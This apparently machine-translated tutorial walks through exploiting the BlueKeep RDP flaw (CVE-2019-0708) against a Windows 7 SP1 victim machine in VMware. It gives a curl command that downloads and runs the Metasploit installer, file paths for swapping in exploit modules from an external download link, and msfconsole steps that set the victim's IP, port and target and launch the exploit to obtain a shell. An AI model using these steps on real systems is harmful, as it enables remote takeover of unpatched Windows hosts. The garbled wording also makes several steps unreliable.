Environmental Vulnerability
Using VMware to install Windows7 SP1 victim machine simulation
Use
Attack tools ready
- 1. Use the following command to update a key frame mounted metasploit
-
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall
- 2. Download the file reference in the document to be placed MSF attack kit folder (if the file already exists, can be directly covered)
-
rdp.rb - > /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb - > /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Attack command
Use msfconsoleshow into the Metasploit framework of
After entering the show using the reload_allreload module uses 0708rdp
Use use exploit/windows/rdp/cve_2019_0708_bluekeep_rceenable 0708RDP module attacks
Use infoviewing tools and information set
It is seen as key to set the primary RHOSTS\ RPORT\target
Use set RHOSTS 受害机IPto set the victim machine IP
Use set RPORT 受害机PORTto set the victim machine RDP port number
Use set target ID数字(可选为0-4)to set the victim machine machine architecture
Here we are using is VMware, then the target 2 satisfy the condition
Use exploitbegan to attack, waiting to establish a connection after the connection is established, using the obtained shell, then use to get an interactive shell then complete the attack, successfully got permission to host victims
reference
Link: https: //pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZg extraction code: ml9g